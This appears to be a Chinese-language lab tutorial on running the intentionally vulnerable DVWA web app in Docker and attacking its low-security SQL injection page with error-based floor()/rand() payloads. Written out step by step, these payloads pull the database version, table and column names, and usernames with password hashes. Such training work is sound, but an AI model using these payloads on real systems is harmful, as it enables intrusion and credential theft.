docker下载dvwa镜像,报错型注入dvwa,low级
一,安装并配置docker
1,更新源,apt-get update && apt-get upgrade && apt-get clean
2,安装docker,apt-get install docker.io
3, 配置docker加速器,vim /etc/docker/daemon.json
{
"registry-mirrors": [
"https://dockerhub.azk8s.cn",
"https://reg-mirror.qiniu.com"
]
}
二、使用docker下载安装运行dvwa
1,搜索dvwa镜像,docker search dvwa
2,安装dvwa镜像,docker pull citizenstig/dvwa
3,查看确定下载完成,输入命令docker images,确定有dvwa
4.运行dvwa,docker run -d –rm -p 8008:80 –name dvwa d9c7999da701
5,确定dvwa容器使用的端口被打开,netstat -ntulp |grep 8008
6,靶机访问127.0.0.1:8008确定可以访问
7,点击Create/Reset Database创建好数据库,点击Login
8,用户名admin,密码password,访问正常,docker安装dvwa完成
三、使用报错型sql注入dvwa,low级别
1,访问靶机ip 192.168.190.134,登录dvwa
2,设置级别为low
3,选择SQL Injection,进入到sql注入页面,使用floor()报错函数进行注入,获取数据库版本信息
1' and 1=1 union select 1,(select 1 from (select count(*),concat('~',(select version()),'~', floor(rand(0)*2)) as a from information_schema.tables group by a)b)#
4,获取数据库表名
1' or 1=2 union select 1,(select 1 from (select count(*),concat('~',(select database()),'~', floor(rand(0)*2)) as a from information_schema.tables group by a)b)#
5,获取数据库的表,
1' or 1=2 union select 1,(select 1 from (select count(*),concat('~',(select table_name from information_schema.tables where table_schema='dvwa' limit 0,1),'~',floor(rand(0)*2)) as a from information_schema.tables group by a)b)#
6,获取表中列名
1' or 1=2 union select 1,(select 1 from (select count(*),concat('~',(select column_name from information_schema.columns where table_name='users' limit 0,1),'~',floor(rand(0)*2)) as a from information_schema.tables group by a)b)#
其他字段修改limit值一个个就可以爆出来就不例举了
7,根据之前获取的列名,发现敏感列user和password获取字段值
1' or 1=2 union select 1, (select 1 from (select count(*),concat('~',(select concat(user,0x7e,password) from users limit 0,1),'~',floor(rand(0)*2)) as a from information_schema.tables group by a)b)#
修改Limit值直到获取不到,就可以得到表中所有用户账户密码信息了,